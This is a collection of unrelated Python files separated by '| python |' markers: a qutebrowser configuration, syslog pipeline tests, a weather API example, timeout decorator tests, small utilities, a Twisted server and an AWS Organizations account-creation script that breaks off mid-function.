# When a hint can be automatically followed without pressing Enter.
# Type: String
# Valid values:
# - always: Auto-follow whenever there is only a single hint on a page.
# - unique-match: Auto-follow whenever there is a unique non-empty match in either the hint string (word mode) or filter (number mode).
# - full-match: Follow the hint when the user typed the whole hint (letter, word or number mode) or the element's text (only in number mode).
# - never: The user will always need to press Enter to follow a hint.
c.hints.auto_follow = 'unique-match'
# Duration (in milliseconds) to ignore normal-mode key bindings after a
# successful auto-follow.
# Type: Int
c.hints.auto_follow_timeout = 0
# CSS border value for hints.
# Type: String
c.hints.border = '1px solid #dadada'
# Characters used for hint strings.
# Type: UniqueCharString
c.hints.chars = 'asdfghjkl'
# Dictionary file to be used by the word hints.
# Type: File
c.hints.dictionary = '/usr/share/dict/words'
# Hide unmatched hints in rapid mode.
# Type: Bool
c.hints.hide_unmatched_rapid_hints = True
# Minimum number of characters used for hint strings.
# Type: Int
c.hints.min_chars = 1
# Mode to use for hints.
# Type: String
# Valid values:
# - number: Use numeric hints. (In this mode you can also type letters from the hinted element to filter and reduce the number of elements that are hinted.)
# - letter: Use the characters in the `hints.chars` setting.
# - word: Use hints words based on the html elements and the extra words.
c.hints.mode = 'letter'
# Comma-separated list of regular expressions to use for 'next' links.
# Type: List of Regex
c.hints.next_regexes = ['\\bnext\\b', '\\bmore\\b', '\\bnewer\\b', '\\b[>→≫]\\b', '\\b(>>|»)\\b', '\\bcontinue\\b']
# Comma-separated list of regular expressions to use for 'prev' links.
# Type: List of Regex
c.hints.prev_regexes = ['\\bprev(ious)?\\b', '\\bback\\b', '\\bolder\\b', '\\b[<←≪]\\b', '\\b(<<|«)\\b']
# Scatter hint key chains (like Vimium) or not (like dwb). Ignored for
# number hints.
# Type: Bool
c.hints.scatter = True
# Make characters in hint strings uppercase.
# Type: Bool
c.hints.uppercase = False
# Allow Escape to quit the crash reporter.
# Type: Bool
c.input.escape_quits_reporter = True
# Automatically enter insert mode if an editable element is focused
# after loading the page.
# Type: Bool
c.input.insert_mode.auto_load = True
# Enter insert mode if an editable element is clicked.
# Type: Bool
c.input.insert_mode.auto_enter = True
# Leave insert mode if a non-editable element is clicked.
# Type: Bool
c.input.insert_mode.auto_leave = True
# Switch to insert mode when clicking flash and other plugins.
# Type: Bool
c.input.insert_mode.plugins = False
# Include hyperlinks in the keyboard focus chain when tabbing.
# Type: Bool
c.input.links_included_in_focus_chain = True
# Timeout (in milliseconds) for partially typed key bindings. If the
# current input forms only partial matches, the keystring will be
# cleared after this time.
# Type: Int
c.input.partial_timeout = 5000
# Enable spatial navigation. Spatial navigation consists in the ability
# to navigate between focusable elements in a Web page, such as
# hyperlinks and form controls, by using Left, Right, Up and Down arrow
# keys. For example, if the user presses the Right key, heuristics
# determine whether there is an element he might be trying to reach
# towards the right and which element he probably wants.
# Type: Bool
c.input.spatial_navigation = False
# Rounding radius (in pixels) for the edges of the keyhint dialog.
# Type: Int
c.keyhint.radius = 6
# Time (in milliseconds) from pressing a key to seeing the keyhint
# dialog.
# Type: Int
c.keyhint.delay = 500
# Duration (in milliseconds) to show messages in the statusbar for. Set
# to 0 to never clear messages.
# Type: Int
c.messages.timeout = 5000
# Show a filebrowser in download prompts.
# Type: Bool
c.prompt.filebrowser = True
# Rounding radius (in pixels) for the edges of prompts.
# Type: Int
c.prompt.radius = 8
# Enable smooth scrolling for web pages. Note smooth scrolling does not
# work with the `:scroll-px` command.
# Type: Bool
c.scrolling.smooth = True
# Languages to use for spell checking. You can check for available
# languages and install dictionaries using scripts/dictcli.py. Run the
# script with -h/--help for instructions.
# Type: List of String
# Valid values:
# - af-ZA: Afrikaans (South Africa)
# - bg-BG: Bulgarian (Bulgaria)
# - ca-ES: Catalan (Spain)
# - cs-CZ: Czech (Czech Republic)
# - da-DK: Danish (Denmark)
# - de-DE: German (Germany)
# - el-GR: Greek (Greece)
# - en-AU: English (Australia)
# - en-CA: English (Canada)
# - en-GB: English (United Kingdom)
# - en-US: English (United States)
# - es-ES: Spanish (Spain)
# - et-EE: Estonian (Estonia)
# - fa-IR: Farsi (Iran)
# - fo-FO: Faroese (Faroe Islands)
# - fr-FR: French (France)
# - he-IL: Hebrew (Israel)
# - hi-IN: Hindi (India)
# - hr-HR: Croatian (Croatia)
# - hu-HU: Hungarian (Hungary)
# - id-ID: Indonesian (Indonesia)
# - it-IT: Italian (Italy)
# - ko: Korean
# - lt-LT: Lithuanian (Lithuania)
# - lv-LV: Latvian (Latvia)
# - nb-NO: Norwegian (Norway)
# - nl-NL: Dutch (Netherlands)
# - pl-PL: Polish (Poland)
# - pt-BR: Portuguese (Brazil)
# - pt-PT: Portuguese (Portugal)
# - ro-RO: Romanian (Romania)
# - ru-RU: Russian (Russia)
# - sh: Serbo-Croatian
# - sk-SK: Slovak (Slovakia)
# - sl-SI: Slovenian (Slovenia)
# - sq: Albanian
# - sr: Serbian
# - sv-SE: Swedish (Sweden)
# - ta-IN: Tamil (India)
# - tg-TG: Tajik (Tajikistan)
# - tr-TR: Turkish (Turkey)
# - uk-UA: Ukrainian (Ukraine)
# - vi-VN: Vietnamese (Viet Nam)
c.spellcheck.languages = ['en-GB']
# Padding (in pixels) for the statusbar.
# Type: Padding
c.statusbar.padding = {'top': 1, 'left': 0, 'bottom': 1, 'right': 0}
# Position of the status bar.
# Type: VerticalPosition
# Valid values:
# - top
# - bottom
c.statusbar.position = 'bottom'
# List of widgets displayed in the statusbar.
# Type: List of String
# Valid values:
# - url: Current page URL.
# - scroll: Percentage of the current page position like `10%`.
# - scroll_raw: Raw percentage of the current page position like `10`.
# - history: Display an arrow when possible to go back/forward in history.
# - tabs: Current active tab, e.g. `2`.
# - keypress: Display pressed keys when composing a vi command.
# - progress: Progress bar for the current page loading.
c.statusbar.widgets = ['keypress', 'url', 'scroll', 'history', 'tabs', 'progress']
# Open new tabs (middleclick/ctrl+click) in the background.
# Type: Bool
c.tabs.background = True
# Mouse button with which to close tabs.
# Type: String
# Valid values:
# - right: Close tabs on right-click.
# - middle: Close tabs on middle-click.
# - none: Don't close tabs using the mouse.
c.tabs.close_mouse_button = 'middle'
# How to behave when the close mouse button is pressed on the tab bar.
# Type: String
# Valid values:
# - new-tab: Open a new tab.
# - close-current: Close the current tab.
# - close-last: Close the last tab.
# - ignore: Don't do anything.
c.tabs.close_mouse_button_on_bar = 'new-tab'
# Scaling factor for favicons in the tab bar. The tab size is unchanged,
# so big favicons also require extra `tabs.padding`.
# Type: Float
c.tabs.favicons.scale = 1.0
# When to show favicons in the tab bar.
# Type: String
# Valid values:
# - always: Always show favicons.
# - never: Always hide favicons.
# - pinned: Show favicons only on pinned tabs.
c.tabs.favicons.show = 'never'
# How to behave when the last tab is closed.
# Type: String
# Valid values:
# - ignore: Don't do anything.
# - blank: Load a blank page.
# - startpage: Load the start page.
# - default-page: Load the default page.
# - close: Close the window.
c.tabs.last_close = 'startpage'
# Switch between tabs using the mouse wheel.
# Type: Bool
c.tabs.mousewheel_switching = True
# Position of new tabs opened from another tab. See
# `tabs.new_position.stacking` for controlling stacking behavior.
# Type: NewTabPosition
# Valid values:
# - prev: Before the current tab.
# - next: After the current tab.
# - first: At the beginning.
# - last: At the end.
c.tabs.new_position.related = 'next'
# Position of new tabs which are not opened from another tab. See
# `tabs.new_position.stacking` for controlling stacking behavior.
# Type: NewTabPosition
# Valid values:
# - prev: Before the current tab.
# - next: After the current tab.
# - first: At the beginning.
# - last: At the end.
c.tabs.new_position.unrelated = 'last'
# Padding (in pixels) around text for tabs.
# Type: Padding
c.tabs.padding = {'top': 0, 'left': 5, 'bottom': 0, 'right': 5}
# When switching tabs, what input mode is applied.
# Type: String
# Valid values:
# - persist: Retain the current mode.
# - restore: Restore previously saved mode.
# - normal: Always revert to normal mode.
c.tabs.mode_on_change = 'normal'
# Position of the tab bar.
# Type: Position
# Valid values:
# - top
# - bottom
# - left
# - right
c.tabs.position = 'top'
# Which tab to select when the focused tab is removed.
# Type: SelectOnRemove
# Valid values:
# - prev: Select the tab which came before the closed one (left in horizontal, above in vertical).
# - next: Select the tab which came after the closed one (right in horizontal, below in vertical).
# - last-used: Select the previously selected tab.
c.tabs.select_on_remove = 'next'
# When to show the tab bar.
# Type: String
# Valid values:
# - always: Always show the tab bar.
# - never: Always hide the tab bar.
# - multiple: Hide the tab bar if only one tab is open.
# - switching: Show the tab bar when switching tabs.
c.tabs.show = 'always'
# Alignment of the text inside of tabs.
# Type: TextAlignment
# Valid values:
# - left
# - right
# - center
c.tabs.title.alignment = 'left'
# Format to use for the tab title for pinned tabs. The same placeholders
# like for `tabs.title.format` are defined.
# Type: FormatString
c.tabs.title.format_pinned = '{index}'
# Width (in pixels or as percentage of the window) of the tab bar if
# it's vertical.
# Type: PercOrInt
c.tabs.width = '20%'
# Width (in pixels) of the progress indicator (0 to disable).
# Type: Int
c.tabs.indicator.width = 3
# Padding (in pixels) for tab indicators.
# Type: Padding
c.tabs.indicator.padding = {'top': 2, 'left': 0, 'bottom': 2, 'right': 4}
# Shrink pinned tabs down to their contents.
# Type: Bool
c.tabs.pinned.shrink = True
# Wrap when changing tabs.
# Type: Bool
c.tabs.wrap = True
# What search to start when something else than a URL is entered.
# Type: String
# Valid values:
# - naive: Use simple/naive check.
# - dns: Use DNS requests (might be slow!).
# - never: Never search automatically.
# - schemeless: Always search automatically unless URL explicitly contains a scheme.
c.url.auto_search = 'naive'
# Page to open if :open -t/-b/-w is used without URL. Use `about:blank`
# for a blank page.
# Type: FuzzyUrl
c.url.default_page = 'file:///home/jagreen/src/github.com/ja-green/startpage/startpage.html'
# Open base URL of the searchengine if a searchengine shortcut is
# invoked without parameters.
# Type: Bool
c.url.open_base_url = True
# Search engines which can be used via the address bar. Maps a search
# engine name (such as `DEFAULT`, or `ddg`) to a URL with a `{}`
# placeholder. The placeholder will be replaced by the search term, use
# `{{` and `}}` for literal `{`/`}` braces. The following further
# placeholds are defined to configure how special characters in the
# search terms are replaced by safe characters (called 'quoting'): *
# `{}` and `{semiquoted}` quote everything except slashes; this is the
# most sensible choice for almost all search engines (for the search
# term `slash/and&` this placeholder expands to `slash/and%26amp`).
# * `{quoted}` quotes all characters (for `slash/and&` this
# placeholder expands to `slash%2Fand%26amp`). * `{unquoted}` quotes
# nothing (for `slash/and&` this placeholder expands to
# `slash/and&`). The search engine named `DEFAULT` is used when
# `url.auto_search` is turned on and something else than a URL was
# entered to be opened. Other search engines can be used by prepending
# the search engine name to the search term, e.g. `:open google
# qutebrowser`.
# Type: Dict
c.url.searchengines = {'DEFAULT': 'https://www.google.com/search?q={}', 'google': 'https://www.google.com/search?q={}'}
# Page(s) to open at the start.
# Type: List of FuzzyUrl, or FuzzyUrl
c.url.start_pages = ['file:///home/jagreen/src/github.com/ja-green/startpage/startpage.html']
# URL parameters to strip with `:yank url`.
# Type: List of String
c.url.yank_ignored_parameters = ['ref', 'utm_source', 'utm_medium', 'utm_campaign', 'utm_term', 'utm_content']
# Hide the window decoration. This setting requires a restart on
# Wayland.
# Type: Bool
c.window.hide_decoration = False
# Default zoom level.
# Type: Perc
c.zoom.default = '75%'
# Available zoom levels.
# Type: List of Perc
c.zoom.levels = ['25%', '33%', '50%', '67%', '75%', '90%', '100%', '110%', '125%', '150%', '175%', '200%', '250%', '300%', '400%', '500%']
# Number of zoom increments to divide the mouse wheel movements to.
# Type: Int
c.zoom.mouse_divider = 512
# Text color of the completion widget. May be a single color to use for
# all columns or a list of three colors, one for each column.
# Type: List of QtColor, or QtColor
c.colors.completion.fg = ['#dadada', '#dadada', '#dadada']
# Background color of the completion widget for odd rows.
# Type: QssColor
c.colors.completion.odd.bg = '#404552'
# Background color of the completion widget for even rows.
# Type: QssColor
c.colors.completion.even.bg = '#404552'
# Foreground color of completion widget category headers.
# Type: QtColor
c.colors.completion.category.fg = '#dadada'
# Background color of the completion widget category headers.
# Type: QssColor
c.colors.completion.category.bg = '#3a3f4d'
# Top border color of the completion widget category headers.
# Type: QssColor
c.colors.completion.category.border.top = '#3a3f4d'
# Bottom border color of the completion widget category headers.
# Type: QssColor
c.colors.completion.category.border.bottom = '#3a3f4d'
# Foreground color of the selected completion item.
# Type: QtColor
c.colors.completion.item.selected.fg = '#000000'
# Background color of the selected completion item.
# Type: QssColor
c.colors.completion.item.selected.bg = '#8ba870'
# Top border color of the selected completion item.
# Type: QssColor
c.colors.completion.item.selected.border.top = '#8ba870'
# Bottom border color of the selected completion item.
# Type: QssColor
c.colors.completion.item.selected.border.bottom = '#8ba870'
# Foreground color of the matched text in the selected completion item.
# Type: QtColor
c.colors.completion.item.selected.match.fg = '#000000'
# Foreground color of the matched text in the completion.
# Type: QtColor
c.colors.completion.match.fg = '#dadada'
# Color of the scrollbar handle in the completion view.
# Type: QssColor
c.colors.completion.scrollbar.fg = '#404552'
# Color of the scrollbar in the completion view.
# Type: QssColor
c.colors.completion.scrollbar.bg = '#3a3f4d'
# Color gradient interpolation system for download text.
# Type: ColorSystem
# Valid values:
# - rgb: Interpolate in the RGB color system.
# - hsv: Interpolate in the HSV color system.
# - hsl: Interpolate in the HSL color system.
# - none: Don't show a gradient.
c.colors.downloads.system.fg = 'rgb'
# Color gradient interpolation system for download backgrounds.
# Type: ColorSystem
# Valid values:
# - rgb: Interpolate in the RGB color system.
# - hsv: Interpolate in the HSV color system.
# - hsl: Interpolate in the HSL color system.
# - none: Don't show a gradient.
c.colors.downloads.system.fg = 'none'
c.colors.downloads.system.bg = 'none'
c.colors.downloads.start.fg = '#dadada'
c.colors.downloads.start.bg = '#968665'
c.colors.downloads.start.fg = '#000000'
c.colors.downloads.start.bg = '#8ba870'
# Foreground color for downloads with errors.
# Type: QtColor
c.colors.downloads.error.fg = '#dadada'
# Background color for downloads with errors.
# Type: QtColor
c.colors.downloads.error.bg = '#966575'
# Font color for hints.
# Type: QssColor
c.colors.hints.fg = '#dadada'
# Background color for hints. Note that you can use a `rgba(...)` value
# for transparency.
# Type: QssColor
c.colors.hints.bg = '#404552'
# Font color for the matched part of hints.
# Type: QtColor
c.colors.hints.match.fg = '#e0be80'
# Highlight color for keys to complete the current keychain.
# Type: QssColor
c.colors.keyhint.suffix.fg = 'purple'
# Foreground color of an error message.
# Type: QssColor
c.colors.messages.error.fg = '#dadada'
# Background color of an error message.
# Type: QssColor
c.colors.messages.error.bg = '#966575'
# Border color of an error message.
# Type: QssColor
c.colors.messages.error.border = '#966575'
# Foreground color of a warning message.
# Type: QssColor
c.colors.messages.warning.fg = '#dadada'
# Background color of a warning message.
# Type: QssColor
c.colors.messages.warning.bg = '#968665'
# Border color of a warning message.
# Type: QssColor
c.colors.messages.warning.border = '#968665'
# Foreground color of an info message.
# Type: QssColor
c.colors.messages.info.fg = '#dadada'
# Background color of an info message.
# Type: QssColor
c.colors.messages.info.bg = '#657596'
# Border color of an info message.
# Type: QssColor
c.colors.messages.info.border = '#657596'
# Foreground color for prompts.
# Type: QssColor
c.colors.prompts.fg = '#dadada'
# Background color for prompts.
# Type: QssColor
c.colors.prompts.bg = '#404552'
# Foreground color of the statusbar.
# Type: QssColor
c.colors.statusbar.normal.fg = '#dadada'
# Background color of the statusbar.
# Type: QssColor
c.colors.statusbar.normal.bg = '#404552'
# Foreground color of the statusbar in insert mode.
# Type: QssColor
c.colors.statusbar.insert.fg = '#000000'
# Background color of the statusbar in insert mode.
# Type: QssColor
c.colors.statusbar.insert.bg = '#8ba870'
# Foreground color of the statusbar in passthrough mode.
# Type: QssColor
c.colors.statusbar.passthrough.fg = '#dadada'
# Background color of the statusbar in passthrough mode.
# Type: QssColor
c.colors.statusbar.passthrough.bg = '#5e8d87'
# Foreground color of the statusbar in private browsing mode.
# Type: QssColor
c.colors.statusbar.private.fg = '#dadada'
# Background color of the statusbar in private browsing mode.
# Type: QssColor
c.colors.statusbar.private.bg = '#383c4a'
# Foreground color of the statusbar in command mode.
# Type: QssColor
c.colors.statusbar.command.fg = '#dadada'
# Background color of the statusbar in command mode.
# Type: QssColor
c.colors.statusbar.command.bg = '#404552'
# Foreground color of the statusbar in private browsing + command mode.
# Type: QssColor
c.colors.statusbar.command.private.fg = '#dadada'
# Background color of the statusbar in private browsing + command mode.
# Type: QssColor
c.colors.statusbar.command.private.bg = '#383c4a'
# Foreground color of the statusbar in caret mode.
# Type: QssColor
c.colors.statusbar.caret.fg = '#dadada'
# Background color of the statusbar in caret mode.
# Type: QssColor
c.colors.statusbar.caret.bg = '#966894'
# Foreground color of the statusbar in caret mode with a selection.
# Type: QssColor
c.colors.statusbar.caret.selection.fg = '#dadada'
# Background color of the statusbar in caret mode with a selection.
# Type: QssColor
c.colors.statusbar.caret.selection.bg = '#b294bb'
# Background color of the progress bar.
# Type: QssColor
c.colors.statusbar.progress.bg = '#383c4a'
# Default foreground color of the URL in the statusbar.
# Type: QssColor
c.colors.statusbar.url.fg = '#dadada'
# Foreground color of the URL in the statusbar on error.
# Type: QssColor
c.colors.statusbar.url.error.fg = '#966575'
# Foreground color of the URL in the statusbar for hovered links.
# Type: QssColor
c.colors.statusbar.url.hover.fg = '#657596'
# Foreground color of the URL in the statusbar on successful load
# (http).
# Type: QssColor
c.colors.statusbar.url.success.http.fg = '#dadada'
# Foreground color of the URL in the statusbar on successful load
# (https).
# Type: QssColor
c.colors.statusbar.url.success.https.fg = '#8ba870'
# Foreground color of the URL in the statusbar when there's a warning.
# Type: QssColor
c.colors.statusbar.url.warn.fg = '#968665'
# Background color of the tab bar.
# Type: QssColor
c.colors.tabs.bar.bg = '#404552'
# Color for the tab indicator on errors.
# Type: QtColor
c.colors.tabs.indicator.error = '#966575'
c.colors.tabs.indicator.start = '#968665'
c.colors.tabs.indicator.stop = '#8ba870'
c.colors.tabs.indicator.system = 'none'
# Foreground color of unselected odd tabs.
# Type: QtColor
c.colors.tabs.odd.fg = '#dadada'
# Background color of unselected odd tabs.
# Type: QtColor
c.colors.tabs.odd.bg = '#3a3f4d'
# Foreground color of unselected even tabs.
# Type: QtColor
c.colors.tabs.even.fg = '#dadada'
# Background color of unselected even tabs.
# Type: QtColor
c.colors.tabs.even.bg = '#3a3f4d'
# Foreground color of selected odd tabs.
# Type: QtColor
c.colors.tabs.selected.odd.fg = '#dadada'
# Background color of selected odd tabs.
# Type: QtColor
c.colors.tabs.selected.odd.bg = '#404552'
# Foreground color of selected even tabs.
# Type: QtColor
c.colors.tabs.selected.even.fg = '#dadada'
# Background color of selected even tabs.
# Type: QtColor
c.colors.tabs.selected.even.bg = '#404552'
# Background color for webpages if unset (or empty to use the theme's
# color).
# Type: QtColor
c.colors.webpage.bg = 'white'
# Default font families to use.
# Type: Font
c.fonts.default_family = 'Inconsolata Nerd Font Mono'
# Default font size to use.
# Type: String
c.fonts.default_size = '8pt'
# Font used in the completion widget.
# Type: Font
c.fonts.completion.entry = 'default_size default_family'
# Font used in the completion categories.
# Type: Font
c.fonts.completion.category = 'default_size default_family'
# Font used for the debugging console.
# Type: Font
c.fonts.debug_console = 'default_size default_family'
# Font used for the downloadbar.
# Type: Font
c.fonts.downloads = 'default_size default_family'
# Font used for the hints.
# Type: Font
c.fonts.hints = 'default_size default_family'
# Font used in the keyhint widget.
# Type: Font
c.fonts.keyhint = 'default_size default_family'
# Font used for error messages.
# Type: Font
c.fonts.messages.error = 'default_size default_family'
# Font used for info messages.
# Type: Font
c.fonts.messages.info = 'default_size default_family'
# Font used for warning messages.
# Type: Font
c.fonts.messages.warning = 'default_size default_family'
# Font used for prompts.
# Type: Font
c.fonts.prompts = 'default_size default_family'
# Font used in the statusbar.
# Type: Font
c.fonts.statusbar = 'default_size default_family'
# This setting can be used to map keys to other keys. When the key used
# as dictionary-key is pressed, the binding for the key used as
# dictionary-value is invoked instead. This is useful for global
# remappings of keys, for example to map Ctrl-[ to Escape. Note that
# when a key is bound (via `bindings.default` or `bindings.commands`),
# the mapping is ignored.
# Type: Dict
c.bindings.key_mappings = {'<Ctrl+[>': '<Escape>', '<Ctrl+6>': '<Ctrl+^>', '<Ctrl+m>': '<Return>', '<Enter>': '<Return>', '<Shift+Enter>': '<Return>', '<Ctrl+Enter>': '<Ctrl+Return>', '<Ctrl+j>': '<Return>', '<Shift+Return>': '<Return>'}
| python |
from docker import Client
import open_nti_input_syslog_lib
import docker.tls as tls
import influxdb
import time
from os import path
import os
import shutil
import pprint
import subprocess
import json
import os.path
from sys import platform as _platform
import time
import requests
import filecmp
import sys
from kafka import KafkaConsumer
from timeout import timeout
################################################################################
def test_connect_docker():
c = open_nti_input_syslog_lib.check_docker()
# Check if connection to Docker work by listing all images
list_images = c.images()
assert len(list_images) >= 1
def test_start_dependancies():
open_nti_input_syslog_lib.start_open_nti()
assert open_nti_input_syslog_lib.check_influxdb_running_database_exist()
# open_nti_input_syslog_lib.start_kafka()
# assert open_nti_input_syslog_lib.check_kafka_is_running()
def test_syslog_qfx_influx_01():
FNAME = 'test_syslog_qfx_01'
PCAP_FILE = FNAME + "/syslog_qfx_01_16000.pcap"
open_nti_input_syslog_lib.start_fluentd_syslog(output_influx='true')
open_nti_input_syslog_lib.replay_file(PCAP_FILE)
time.sleep(5)
db = open_nti_input_syslog_lib.get_influxdb_handle()
query = 'SELECT * FROM events'
result = db.query(query)
points = result.get_points()
assert len(list(points)) != 0
# @timeout(30)
# def test_syslog_qfx_kafka_01():
#
# FNAME = 'test_syslog_qfx_01'
# PCAP_FILE = FNAME + "/syslog_qfx_01_16000.pcap"
#
# open_nti_input_syslog_lib.start_fluentd_syslog(output_kafka='true')
# time.sleep(1)
# open_nti_input_syslog_lib.replay_file(PCAP_FILE)
#
# time.sleep(5)
#
# counter = open_nti_input_syslog_lib.check_kafka_msg()
#
# assert counter == 100
def teardown_module(module):
global c
global TCP_RELAY_CONTAINER_NAME
# if not os.getenv('TRAVIS'):
open_nti_input_syslog_lib.stop_fluentd()
open_nti_input_syslog_lib.stop_open_nti()
# open_nti_input_syslog_lib.stop_kafka()
try:
old_container_id = c.inspect_container(TCP_RELAY_CONTAINER_NAME)['Id']
c.stop(container=old_container_id)
c.remove_container(container=old_container_id)
except:
print "Container do not exit"
| python |
import asyncio
import aiohttp
import pynws
PHILLY = (39.95, -75.16)
USERID = "[email protected]"
async def example():
async with aiohttp.ClientSession() as session:
nws = pynws.SimpleNWS(*PHILLY, USERID, session)
await nws.set_station()
await nws.update_observation()
await nws.update_forecast()
await nws.update_alerts_forecast_zone()
print(nws.observation)
print(nws.forecast[0])
print(nws.alerts_forecast_zone)
loop = asyncio.get_event_loop()
loop.run_until_complete(example())
| python |
##
# File: TimeoutDecoratorTests.py
# Author: J. Westbrook
# Date: 25-Oct-2019
# Version: 0.001
#
# Updates:
##
"""
Test cases for timeout decorator
"""
__docformat__ = "google en"
__author__ = "John Westbrook"
__email__ = "[email protected]"
__license__ = "Apache 2.0"
import logging
import os
import time
import unittest
from rcsb.utils.io.decorators import timeout, timeoutMp, TimeoutException
HERE = os.path.abspath(os.path.dirname(__file__))
TOPDIR = os.path.dirname(os.path.dirname(os.path.dirname(HERE)))
logging.basicConfig(level=logging.INFO, format="%(asctime)s [%(levelname)s]-%(module)s.%(funcName)s: %(message)s")
logger = logging.getLogger()
logger.setLevel(logging.INFO)
@timeoutMp(10)
def longrunner2():
iSeconds = 20
logger.info("SLEEPING FOR %d seconds", iSeconds)
time.sleep(iSeconds)
logger.info("SLEEPING COMPLETED")
class TimeoutDecoratorTests(unittest.TestCase):
"""
Test cases for timeout decorator
"""
def setUp(self):
#
self.__startTime = time.time()
logger.debug("Starting %s at %s", self.id(), time.strftime("%Y %m %d %H:%M:%S", time.localtime()))
def tearDown(self):
endTime = time.time()
logger.debug("Completed %s at %s (%.4f seconds)", self.id(), time.strftime("%Y %m %d %H:%M:%S", time.localtime()), endTime - self.__startTime)
@timeout(10)
def __longrunner1(self, iSeconds=10):
logger.info("SLEEPING FOR %d seconds", iSeconds)
time.sleep(iSeconds)
logger.info("SLEEPING COMPLETED")
def testTimeoutSignal(self):
"""Test case - timeout decorator (signal)"""
try:
self.__longrunner1(20)
except TimeoutException as e:
logger.info("Caught timeout exception %s", str(e))
except Exception as e:
logger.exception("Failing with %s", str(e))
self.fail()
else:
logger.info("Successful completion")
@timeoutMp(10)
def __longrunner2(self, iSeconds=10):
logger.info("SLEEPING FOR %d seconds", iSeconds)
time.sleep(iSeconds)
logger.info("SLEEPING COMPLETED")
@unittest.skip("Python 3.8 macos serialization issue")
def testTimeoutMulti(self):
"""Test case - timeout decorator (multiprocessing)"""
try:
longrunner2()
except TimeoutException as e:
logger.info("Caught timeout exception %s", str(e))
except Exception as e:
logger.exception("Failing with %s", str(e))
self.fail()
else:
logger.info("Successful completion")
def suiteTimeout():
suiteSelect = unittest.TestSuite()
suiteSelect.addTest(TimeoutDecoratorTests("testTimeoutMulti"))
suiteSelect.addTest(TimeoutDecoratorTests("testTimeoutSignal"))
return suiteSelect
if __name__ == "__main__":
mySuite = suiteTimeout()
unittest.TextTestRunner(verbosity=2).run(mySuite)
| python |
"""
Classes of config fields, description of standard models of config fields.
"""
import pprint
class DefaultConfigField:
"""Config field containing any value"""
def __init__(self, name: str, value: any = None):
self.name = name
self._value = value
@property
def value(self, value: any = None):
if value is not None:
self._value = value
return self._value
def __repr__(self):
return f"(default) {self.name}: {self.value}"
def __str__(self):
return f"(default) {self.name}: {self.value}"
class ImmutableConfigField(DefaultConfigField):
"""Immutable config field"""
def __init__(self, name: str, value: any = None):
super(ImmutableConfigField, self).__init__(name, value)
@property
def value(self, value):
if self._value is None:
self._value = value
return value
return self._value
class SecretConfigField(DefaultConfigField):
"""Config Secret (Encrypted)"""
...
| python |
#!/usr/bin/python3
"""fsdb2many converts a single FSDB file into many, by creating
other file names based on a column of the original."""
import sys
import argparse
import pyfsdb
import re
def parse_args():
parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter,
description=__doc__,
epilog="fsdb2many -c key -o outputdir/%s.fsdb mybigfile.fsdb")
parser.add_argument("-c", "--column", default="key", type=str,
help="Column to split on")
parser.add_argument("-o", "--output-pattern",
default="fsdb2many-out-%s.fsdb",
type=str,
help="Output pattern to split on, which should contain a PERCENT S to use for inserting the column value being saved to that file.")
parser.add_argument("input_file", type=argparse.FileType('r'),
nargs='?', default=sys.stdin,
help="str")
args = parser.parse_args()
return args
def main():
args = parse_args()
# open the input file
inh = pyfsdb.Fsdb(file_handle=args.input_file)
key_column = inh.get_column_number(args.column)
out_handles = {}
for row in inh:
value = row[key_column]
# see if we have an open file handle for this one yet
if value not in out_handles:
# new value, so open a new file handle to save data for it
file_name = re.sub("[^-.0-9a-zA-Z_]", "_", str(value))
outh = pyfsdb.Fsdb(out_file=(args.output_pattern % file_name))
outh.column_names = inh.column_names
out_handles[value] = outh
# save the row to the file based on its value
out_handles[value].append(row)
# clean up
for handle in out_handles:
out_handles[handle].close()
if __name__ == "__main__":
main()
| python |
def levenshtein(a,b):
| python |
#!/usr/bin/env python
from twisted.web import server, resource
from twisted.internet import reactor
class HelloResource(resource.Resource):
isLeaf = True
numberRequests = 0
def render_GET(self, request):
self.numberRequests += 1
request.setHeader("content-type", "text/plain")
return "I am request #" + str(self.numberRequests) + "\n"
reactor.listenTCP(8081, server.Site(HelloResource()))
reactor.run()
| python |
import boto3
import pprint
import time
import ast
import random
import os
import json
import botocore
import argparse
import sys
from botocore.exceptions import ClientError
def check_env_variables():
if os.environ.get('OU_NAME') is not None:
print("OU_NAME: {} is set as an environment variable.".format(os.environ.get('OU_NAME')))
else:
print('OU_NAME is NOT set as an environment variable. Exit!')
exit(1)
if os.environ.get('DEFAULT_CHILD_ACCOUNT_PASS') is not None:
print("<DEFAULT_CHILD_ACCOUNT_PASS> is set as an environment variable.")
else:
print('<DEFAULT_CHILD_ACCOUNT_PASS> is NOT set as an environment variable. Exit!')
exit(1)
if os.environ.get('BUDGET_LIMIT') is not None:
print("<BUDGET_LIMIT>: ${} is set as an environment variable.".format(os.environ.get('BUDGET_LIMIT')))
else:
print('<BUDGET_LIMIT> is NOT set as an environment variable. Exit!')
exit(1)
if os.environ.get('BUDGET_NOTIFIERS_LIST') is not None:
print("<BUDGET_NOTIFIERS_LIST>: {} is set as an environment variable.".format(os.environ.get('BUDGET_NOTIFIERS_LIST')))
else:
print("<BUDGET_NOTIFIERS_LIST> is NOT set as an environment variable. It can be as a list as comma seperated.(i.e. BUDGET_NOTIFIERS_LIST='[email protected], [email protected]' ).Exit!")
exit(1)
if os.environ.get('CHILD_ACCOUNT_BILLING_ACCESS') is not None:
if os.environ.get('CHILD_ACCOUNT_BILLING_ACCESS') == 'TRUE' or os.environ.get('CHILD_ACCOUNT_BILLING_ACCESS') == 'FALSE':
print("<CHILD_ACCOUNT_BILLING_ACCESS>: {} is set as an environment variable.".format(os.environ.get('CHILD_ACCOUNT_BILLING_ACCESS')))
else:
print("<CHILD_ACCOUNT_BILLING_ACCESS> is MUST set as a 'TRUE' or 'FALSE'. Exit!")
exit(1)
else:
print("<CHILD_ACCOUNT_BILLING_ACCESS> is NOT set as an environment variable. It can be 'TRUE' or 'FALSE'. Exit!")
exit(1)
def get_account_id(client, email):
paginator = client.get_paginator(
'list_accounts').paginate().build_full_result()
accounts = paginator['Accounts']
account_id= None
found = False
for account in accounts:
if str(email) == str(account['Email']):
found = True
account_id = account['Id']
print("Child account email found {} with {}".format(email,account_id))
break
if not found:
print("Child account email NOT exists:", email)
return account_id
def create_child_account(client, email, account_name, role_name, iam_user_access_to_billing):
response = client.create_account(
Email=email,
AccountName=account_name,
RoleName=role_name,
IamUserAccessToBilling=iam_user_access_to_billing
)
return response
def assume_child_credentials(client,account_id):
role_arn="arn:aws:iam::{}:role/OrganizationAccountAccessRole".format(account_id)
sesion_name="AssumeRoleSession-{}".format(random.randint(0,10000000000000000)+1)
result= None
